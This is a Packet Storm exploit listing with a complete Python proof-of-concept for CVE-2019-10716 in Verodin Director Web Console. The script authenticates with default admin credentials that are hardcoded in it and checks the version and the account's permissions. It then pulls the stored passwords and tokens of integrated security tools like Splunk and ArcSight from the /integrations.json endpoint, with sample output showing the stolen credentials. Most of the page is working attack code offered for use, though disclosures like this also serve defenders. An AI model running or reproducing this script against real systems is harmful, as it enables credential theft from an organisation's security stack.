exploit the possibilities

Verodin Director Web Console 3.5.4.0 Password Disclosure

Verodin Director Web Console 3.5.4.0 Password Disclosure
Posted Feb 5, 2020
Authored by Nolan B. Kennedy

Verodin Director Web Console version 3.5.4.0 remote authenticated password disclosure proof of concept exploit.

tags | exploit, remote, web, proof of concept, info disclosure
advisories | CVE-2019-10716
MD5 | b80441f581b37ec759191c45b35f987a

Verodin Director Web Console 3.5.4.0 Password Disclosure

Change Mirror Download
#  Exploit Title: Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)
# Discovery Date: 2019-01-31
# Exploit Author: Nolan B. Kennedy (nxkennedy)
# Vendor Homepage: https://www.verodin.com/
# Software Link : https://www.verodin.com/demo-request/demo-request-form
# Tested Versions: v3.5.1.0, v3.5.2.0, v3.5.3.1
# Tested On: Windows
# CVE: CVE-2019-10716
# Vulnerability Type: Sensitive Data Disclosure
###
# Description: Verodin Director's REST API allows authenticated users to query the configuration
# details, which include credentials, of any 50+ possible integrated security tools (e.g. Splunk, ArcSight, Palo Alto, AWS Cloud Trail).
# Fortunately for attackers, members of 3 out of the 4 user groups in the Director can query this info (Users, Power Users, System Admin).
#
# API Request: GET https://<director-ip>/integrations.json
#
# Usage: python3 script.py
#
# Example Output:
#
# -- VERODIN DIRECTOR WEB CONSOLE < V3.5.4.0 - REMOTE AUTHENTICATED PASSWORD DISCLOSURE (POC) --
# -- Author: Nolan B. Kennedy (nxkennedy) --
#
#
# [+] Director Version
# =====================
# [*] Detected version 3.5.1.0 is VULNERABLE! :)
#
#
# [+] Account Permissions
# ========================
# [*] "admin@verodin.com" is a member of "System Admin"
#
#
# [+] Verodin Integrations
# =========================
# [*] Product: splunk
# [*] Username: splunk_svc_acct
# [*] Misc (may include credentials): [{'scheme': 'https', 'basic': False, 'password': 'Sup3rP@ssw0rd',
# 'port': 8089, 'host': '10.0.0.6', 'username': 'splunk_svc_acct'},
# {'proxy_hash': None}]
#
# [*] Product: arcsight
# [*] Username: arcsight_admin
# [*] Misc (may include credentials): ['10.0.0.7', 8443, 'https', 'arcsight_admin', 'Sup3rP@ssw0rd',
# "/All Filters/Personal/integration_user's filters/Verodin Filter", 'Verodin Query Viewer', 60]
#
# [+] Done!
###

import base64
from distutils.version import LooseVersion
import json
import re
import ssl
from sys import exit
from time import sleep
import urllib.request




verodin_ip = '0.0.0.0'
# Default System Admin creds. Worth a try.
username = 'admin@verodin.com'
password = 'Ver0d!nP@$$'
base_url = 'https://{}'.format(verodin_ip)
fixed_version = '3.5.4.0'


# We'll be making 3 different requests so we need a web handling function
def requests(target, html=False):

url = base_url + target
context = ssl._create_unverified_context() # so we don't get an ssl cert error
req = urllib.request.Request(url)
credentials = ('{}:{}'.format(username, password))
encoded_credentials = base64.b64encode(credentials.encode('ascii'))
req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii")) # use %s instead of format because errors
r = urllib.request.urlopen(req, context=context)
content = r.read().decode('utf-8')
if r.getcode() == 200:
# we don't always get a 401 if auth fails
if 'Cookies need to be enabled' in content:
print('[!] Failed to retrieve data: Credentials incorrect/invalid')
print()
print('[!] Exiting...')
exit(1)
elif html:
blob = content
else:
blob = json.loads(content)
return blob
elif r.getcode() == 401:
print('[!] Failed to retrieve data: Credentials incorrect/invalid')
print()
print('[!] Exiting...')
exit(1)
else:
print('[!] ERROR: Status Code {}'.format(r.getcode()))
exit(1)


# Do we have permissions to retrieve the creds?
def getUserPerms():

target = '/users/user_prefs.json'
r = requests(target) # returns a single json dict
print('\n[+] Account Permissions')
print('========================')
group_id = r['user_group_id']
roles = {'Reporting': 4, 'Users': 3, 'Power Users': 2, 'System Admin': 1}
for role,value in roles.items():
if group_id == value:
print('[*] "{}" is a member of "{}"'.format(username, role))
print()
if group_id == 4:
print('[!] This account does not have sufficient privs. You need "Users" or higher.')
print()
print('[!] Exiting...')
exit(1)
sleep(0.5)


# We need to verify the target Director is running a vulnerable version
def checkVuln():

target = '/settings/system'
r = requests(target, html=True)
field = re.search(r'Director\sVersion:.*', r)
version = field.group().split('<')[0].split(" ")[2]
print('\n[+] Director Version')
print('=====================')
if LooseVersion(version) < LooseVersion(fixed_version):
print('[*] Detected version {} is VULNERABLE! :)'.format(version))
print()
else:
print('[!] Detected version {} is not vulnerable. Must be < {}'.format(version, fixed_version))
print()
print('[!] Exiting...')

sleep(0.5)


# Where we parse out any creds or other useful info
def getLoot():

target = '/integrations.json'
r = requests(target) # a list of json dicts
print('\n[+] Verodin Integrations')
print('=========================')
if not r:
print('[+] Dang! No integrations configured in this Director :(')
print()
else:
for integration in r:
product = integration['package_name'] # constant key
misc = integration.get('new_client_args') # we use .get to return a None type if the key doesn't exist
user = integration.get('username')
passw = integration.get('password')
token = integration.get('auth_token')
print('[*] Product: {}'.format(product))
if user:
print('[*] Username: {}'.format(user))
if passw:
print('[*] Password: {}'.format(passw))
if token and token is not 'null':
print('[*] Auth Token: {}'.format(token))
if misc:
print('[*] Misc (may include credentials): {}'.format(misc))
print()
sleep(0.5)


def main():

print('\n-- Verodin Director Web Console < v3.5.4.0 - Remote Authenticated Password Disclosure (PoC) --'.upper())
print('-- Author: Nolan B. Kennedy (nxkennedy) --')
print()
checkVuln()
getUserPerms()
getLoot()
print('[+] Done!')


if __name__ == '__main__':
main()
Login or Register to add favorites

File Archive:

November 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    2 Files
  • 2
    Nov 2nd
    9 Files
  • 3
    Nov 3rd
    15 Files
  • 4
    Nov 4th
    90 Files
  • 5
    Nov 5th
    22 Files
  • 6
    Nov 6th
    16 Files
  • 7
    Nov 7th
    1 Files
  • 8
    Nov 8th
    1 Files
  • 9
    Nov 9th
    40 Files
  • 10
    Nov 10th
    27 Files
  • 11
    Nov 11th
    28 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    18 Files
  • 14
    Nov 14th
    2 Files
  • 15
    Nov 15th
    2 Files
  • 16
    Nov 16th
    29 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    15 Files
  • 19
    Nov 19th
    21 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    19 Files
  • 24
    Nov 24th
    32 Files
  • 25
    Nov 25th
    9 Files
  • 26
    Nov 26th
    11 Files
  • 27
    Nov 27th
    15 Files
  • 28
    Nov 28th
    9 Files
  • 29
    Nov 29th
    2 Files
  • 30
    Nov 30th
    17 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close